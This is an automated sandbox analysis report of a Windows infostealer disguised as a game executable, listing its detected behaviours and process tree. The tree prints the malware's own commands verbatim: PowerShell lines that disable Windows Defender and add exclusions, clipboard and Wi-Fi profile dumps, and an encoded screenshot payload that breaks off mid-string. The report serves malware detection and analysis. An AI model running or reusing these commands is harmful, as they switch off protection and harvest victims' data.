da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524

Analysis

max time kernel
160s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
09-07-2024 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

unnamedgame.exe
Size

6.9MB
MD5

dd7004fc866d6f2872e0771b24d8d206
SHA1

adc25bdc1d43c2fe970870f3f1152029056591f2
SHA256

da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524
SHA512

bb64b65790b28cbf78723e49ff21ecfe6d081f41ccccbdc2df1d3ebbd52c05f3e623c49d45820307bd1218bd8412a5ef574870f28e22898f7dfbbdfa72e69dee
SSDEEP

98304:Hr7YzdbM+Q2y+RvK/+6jOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbLqledV1BqDS:Hr7e/vQOjmFQR4MVGFtwLPNledV1YnO

Score

8^/10

execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4280	powershell.exe
1912	powershell.exe
4492	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	unnamedgame.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
4360	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe
2100	unnamedgame.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023488-21.dat	upx
behavioral1/memory/2100-25-0x00007FFD07610000-0x00007FFD07BF9000-memory.dmp	upx
behavioral1/files/0x000700000002347b-27.dat	upx
behavioral1/files/0x0007000000023486-30.dat	upx
behavioral1/memory/2100-32-0x00007FFD1EBA0000-0x00007FFD1EBAF000-memory.dmp	upx
behavioral1/memory/2100-31-0x00007FFD1AE70000-0x00007FFD1AE93000-memory.dmp	upx
behavioral1/files/0x0007000000023482-48.dat	upx
behavioral1/files/0x0007000000023481-47.dat	upx
behavioral1/files/0x0007000000023480-46.dat	upx
behavioral1/files/0x000700000002347f-45.dat	upx
behavioral1/files/0x000700000002347e-44.dat	upx
behavioral1/files/0x000700000002347d-43.dat	upx
behavioral1/files/0x000700000002347c-42.dat	upx
behavioral1/files/0x000800000002347a-41.dat	upx
behavioral1/files/0x000700000002348d-40.dat	upx
behavioral1/files/0x000700000002348c-39.dat	upx
behavioral1/files/0x000700000002348b-38.dat	upx
behavioral1/files/0x0007000000023487-35.dat	upx
behavioral1/files/0x0007000000023485-34.dat	upx
behavioral1/memory/2100-54-0x00007FFD18200000-0x00007FFD1822D000-memory.dmp	upx
behavioral1/memory/2100-56-0x00007FFD1C440000-0x00007FFD1C459000-memory.dmp	upx
behavioral1/memory/2100-58-0x00007FFD181D0000-0x00007FFD181F3000-memory.dmp	upx
behavioral1/memory/2100-60-0x00007FFD07CF0000-0x00007FFD07E60000-memory.dmp	upx
behavioral1/memory/2100-64-0x00007FFD1AD90000-0x00007FFD1AD9D000-memory.dmp	upx
behavioral1/memory/2100-63-0x00007FFD1AEC0000-0x00007FFD1AED9000-memory.dmp	upx
behavioral1/memory/2100-66-0x00007FFD17FE0000-0x00007FFD1800E000-memory.dmp	upx
behavioral1/memory/2100-69-0x00007FFD17470000-0x00007FFD17528000-memory.dmp	upx
behavioral1/memory/2100-71-0x00007FFD07290000-0x00007FFD07609000-memory.dmp	upx
behavioral1/memory/2100-72-0x00007FFD07610000-0x00007FFD07BF9000-memory.dmp	upx
behavioral1/memory/2100-80-0x00007FFD07170000-0x00007FFD0728C000-memory.dmp	upx
behavioral1/memory/2100-79-0x00007FFD17810000-0x00007FFD1781D000-memory.dmp	upx
behavioral1/memory/2100-78-0x00007FFD17820000-0x00007FFD17834000-memory.dmp	upx
behavioral1/memory/2100-76-0x00007FFD1AE70000-0x00007FFD1AE93000-memory.dmp	upx
behavioral1/memory/2100-266-0x00007FFD181D0000-0x00007FFD181F3000-memory.dmp	upx
behavioral1/memory/2100-267-0x00007FFD07CF0000-0x00007FFD07E60000-memory.dmp	upx
behavioral1/memory/2100-305-0x00007FFD07610000-0x00007FFD07BF9000-memory.dmp	upx
behavioral1/memory/2100-316-0x00007FFD07290000-0x00007FFD07609000-memory.dmp	upx
behavioral1/memory/2100-320-0x00007FFD1AEC0000-0x00007FFD1AED9000-memory.dmp	upx
behavioral1/memory/2100-315-0x00007FFD17470000-0x00007FFD17528000-memory.dmp	upx
behavioral1/memory/2100-314-0x00007FFD17FE0000-0x00007FFD1800E000-memory.dmp	upx
behavioral1/memory/2100-311-0x00007FFD07CF0000-0x00007FFD07E60000-memory.dmp	upx
behavioral1/memory/2100-306-0x00007FFD1AE70000-0x00007FFD1AE93000-memory.dmp	upx
behavioral1/memory/2100-350-0x00007FFD17810000-0x00007FFD1781D000-memory.dmp	upx
behavioral1/memory/2100-352-0x00007FFD07170000-0x00007FFD0728C000-memory.dmp	upx
behavioral1/memory/2100-349-0x00007FFD17820000-0x00007FFD17834000-memory.dmp	upx
behavioral1/memory/2100-348-0x00007FFD07290000-0x00007FFD07609000-memory.dmp	upx
behavioral1/memory/2100-347-0x00007FFD17470000-0x00007FFD17528000-memory.dmp	upx
behavioral1/memory/2100-346-0x00007FFD17FE0000-0x00007FFD1800E000-memory.dmp	upx
behavioral1/memory/2100-345-0x00007FFD1AD90000-0x00007FFD1AD9D000-memory.dmp	upx
behavioral1/memory/2100-344-0x00007FFD1AEC0000-0x00007FFD1AED9000-memory.dmp	upx
behavioral1/memory/2100-343-0x00007FFD07CF0000-0x00007FFD07E60000-memory.dmp	upx
behavioral1/memory/2100-342-0x00007FFD181D0000-0x00007FFD181F3000-memory.dmp	upx
behavioral1/memory/2100-341-0x00007FFD1C440000-0x00007FFD1C459000-memory.dmp	upx
behavioral1/memory/2100-340-0x00007FFD18200000-0x00007FFD1822D000-memory.dmp	upx
behavioral1/memory/2100-339-0x00007FFD1EBA0000-0x00007FFD1EBAF000-memory.dmp	upx
behavioral1/memory/2100-338-0x00007FFD1AE70000-0x00007FFD1AE93000-memory.dmp	upx
behavioral1/memory/2100-337-0x00007FFD07610000-0x00007FFD07BF9000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
92	ip-api.com
94	ip-api.com
96	ip-api.com
106	ip-api.com
5	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4800	WMIC.exe
2284	WMIC.exe
1932	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
2436	tasklist.exe
464	tasklist.exe
1216	tasklist.exe
2644	tasklist.exe
3976	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2212	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3352	powershell.exe
4280	powershell.exe
3352	powershell.exe
4280	powershell.exe
1912	powershell.exe
1912	powershell.exe
5016	powershell.exe
5016	powershell.exe
4492	powershell.exe
4492	powershell.exe
5016	powershell.exe
4492	powershell.exe
1248	powershell.exe
1248	powershell.exe
4668	powershell.exe
4668	powershell.exe
1068	powershell.exe
1068	powershell.exe
3704	powershell.exe
3704	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4520	WMIC.exe
Token: SeSecurityPrivilege	4520	WMIC.exe
Token: SeTakeOwnershipPrivilege	4520	WMIC.exe
Token: SeLoadDriverPrivilege	4520	WMIC.exe
Token: SeSystemProfilePrivilege	4520	WMIC.exe
Token: SeSystemtimePrivilege	4520	WMIC.exe
Token: SeProfSingleProcessPrivilege	4520	WMIC.exe
Token: SeIncBasePriorityPrivilege	4520	WMIC.exe
Token: SeCreatePagefilePrivilege	4520	WMIC.exe
Token: SeBackupPrivilege	4520	WMIC.exe
Token: SeRestorePrivilege	4520	WMIC.exe
Token: SeShutdownPrivilege	4520	WMIC.exe
Token: SeDebugPrivilege	4520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4520	WMIC.exe
Token: SeRemoteShutdownPrivilege	4520	WMIC.exe
Token: SeUndockPrivilege	4520	WMIC.exe
Token: SeManageVolumePrivilege	4520	WMIC.exe
Token: 33	4520	WMIC.exe
Token: 34	4520	WMIC.exe
Token: 35	4520	WMIC.exe
Token: 36	4520	WMIC.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeIncreaseQuotaPrivilege	4520	WMIC.exe
Token: SeSecurityPrivilege	4520	WMIC.exe
Token: SeTakeOwnershipPrivilege	4520	WMIC.exe
Token: SeLoadDriverPrivilege	4520	WMIC.exe
Token: SeSystemProfilePrivilege	4520	WMIC.exe
Token: SeSystemtimePrivilege	4520	WMIC.exe
Token: SeProfSingleProcessPrivilege	4520	WMIC.exe
Token: SeIncBasePriorityPrivilege	4520	WMIC.exe
Token: SeCreatePagefilePrivilege	4520	WMIC.exe
Token: SeBackupPrivilege	4520	WMIC.exe
Token: SeRestorePrivilege	4520	WMIC.exe
Token: SeShutdownPrivilege	4520	WMIC.exe
Token: SeDebugPrivilege	4520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4520	WMIC.exe
Token: SeRemoteShutdownPrivilege	4520	WMIC.exe
Token: SeUndockPrivilege	4520	WMIC.exe
Token: SeManageVolumePrivilege	4520	WMIC.exe
Token: 33	4520	WMIC.exe
Token: 34	4520	WMIC.exe
Token: 35	4520	WMIC.exe
Token: 36	4520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4800	WMIC.exe
Token: SeSecurityPrivilege	4800	WMIC.exe
Token: SeTakeOwnershipPrivilege	4800	WMIC.exe
Token: SeLoadDriverPrivilege	4800	WMIC.exe
Token: SeSystemProfilePrivilege	4800	WMIC.exe
Token: SeSystemtimePrivilege	4800	WMIC.exe
Token: SeProfSingleProcessPrivilege	4800	WMIC.exe
Token: SeIncBasePriorityPrivilege	4800	WMIC.exe
Token: SeCreatePagefilePrivilege	4800	WMIC.exe
Token: SeBackupPrivilege	4800	WMIC.exe
Token: SeRestorePrivilege	4800	WMIC.exe
Token: SeShutdownPrivilege	4800	WMIC.exe
Token: SeDebugPrivilege	4800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4800	WMIC.exe
Token: SeRemoteShutdownPrivilege	4800	WMIC.exe
Token: SeUndockPrivilege	4800	WMIC.exe
Token: SeManageVolumePrivilege	4800	WMIC.exe
Token: 33	4800	WMIC.exe
Token: 34	4800	WMIC.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe
4524	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4524	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 2100	2352	unnamedgame.exe	82
PID 2352 wrote to memory of 2100	2352	unnamedgame.exe	82
PID 2100 wrote to memory of 368	2100	unnamedgame.exe	86
PID 2100 wrote to memory of 368	2100	unnamedgame.exe	86
PID 2100 wrote to memory of 4092	2100	unnamedgame.exe	87
PID 2100 wrote to memory of 4092	2100	unnamedgame.exe	87
PID 2100 wrote to memory of 2704	2100	unnamedgame.exe	90
PID 2100 wrote to memory of 2704	2100	unnamedgame.exe	90
PID 2100 wrote to memory of 3400	2100	unnamedgame.exe	92
PID 2100 wrote to memory of 3400	2100	unnamedgame.exe	92
PID 2704 wrote to memory of 2436	2704	cmd.exe	94
PID 2704 wrote to memory of 2436	2704	cmd.exe	94
PID 368 wrote to memory of 4280	368	cmd.exe	95
PID 368 wrote to memory of 4280	368	cmd.exe	95
PID 4092 wrote to memory of 3352	4092	cmd.exe	96
PID 4092 wrote to memory of 3352	4092	cmd.exe	96
PID 3400 wrote to memory of 4520	3400	cmd.exe	97
PID 3400 wrote to memory of 4520	3400	cmd.exe	97
PID 2100 wrote to memory of 1380	2100	unnamedgame.exe	99
PID 2100 wrote to memory of 1380	2100	unnamedgame.exe	99
PID 1380 wrote to memory of 1192	1380	cmd.exe	101
PID 1380 wrote to memory of 1192	1380	cmd.exe	101
PID 2100 wrote to memory of 2972	2100	unnamedgame.exe	102
PID 2100 wrote to memory of 2972	2100	unnamedgame.exe	102
PID 2972 wrote to memory of 3048	2972	cmd.exe	104
PID 2972 wrote to memory of 3048	2972	cmd.exe	104
PID 2100 wrote to memory of 380	2100	unnamedgame.exe	105
PID 2100 wrote to memory of 380	2100	unnamedgame.exe	105
PID 380 wrote to memory of 4800	380	cmd.exe	107
PID 380 wrote to memory of 4800	380	cmd.exe	107
PID 2100 wrote to memory of 2248	2100	unnamedgame.exe	149
PID 2100 wrote to memory of 2248	2100	unnamedgame.exe	149
PID 2248 wrote to memory of 2284	2248	cmd.exe	110
PID 2248 wrote to memory of 2284	2248	cmd.exe	110
PID 2100 wrote to memory of 4864	2100	unnamedgame.exe	111
PID 2100 wrote to memory of 4864	2100	unnamedgame.exe	111
PID 4864 wrote to memory of 1912	4864	cmd.exe	113
PID 4864 wrote to memory of 1912	4864	cmd.exe	113
PID 2100 wrote to memory of 2312	2100	unnamedgame.exe	115
PID 2100 wrote to memory of 2312	2100	unnamedgame.exe	115
PID 2100 wrote to memory of 1820	2100	unnamedgame.exe	114
PID 2100 wrote to memory of 1820	2100	unnamedgame.exe	114
PID 2312 wrote to memory of 464	2312	cmd.exe	118
PID 2312 wrote to memory of 464	2312	cmd.exe	118
PID 1820 wrote to memory of 1216	1820	cmd.exe	119
PID 1820 wrote to memory of 1216	1820	cmd.exe	119
PID 2100 wrote to memory of 2216	2100	unnamedgame.exe	120
PID 2100 wrote to memory of 2216	2100	unnamedgame.exe	120
PID 2100 wrote to memory of 3848	2100	unnamedgame.exe	121
PID 2100 wrote to memory of 3848	2100	unnamedgame.exe	121
PID 2100 wrote to memory of 3876	2100	unnamedgame.exe	122
PID 2100 wrote to memory of 3876	2100	unnamedgame.exe	122
PID 2100 wrote to memory of 2944	2100	unnamedgame.exe	126
PID 2100 wrote to memory of 2944	2100	unnamedgame.exe	126
PID 2100 wrote to memory of 4304	2100	unnamedgame.exe	127
PID 2100 wrote to memory of 4304	2100	unnamedgame.exe	127
PID 3848 wrote to memory of 5016	3848	cmd.exe	130
PID 3848 wrote to memory of 5016	3848	cmd.exe	130
PID 2100 wrote to memory of 5020	2100	unnamedgame.exe	131
PID 2100 wrote to memory of 5020	2100	unnamedgame.exe	131
PID 2100 wrote to memory of 3236	2100	unnamedgame.exe	132
PID 2100 wrote to memory of 3236	2100	unnamedgame.exe	132
PID 2100 wrote to memory of 2776	2100	unnamedgame.exe	135
PID 2100 wrote to memory of 2776	2100	unnamedgame.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2600	attrib.exe
2008	attrib.exe

C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe
"C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe
  "C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\unnamedgame.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1820
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2216
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2944
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4304
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5020
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3236
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAA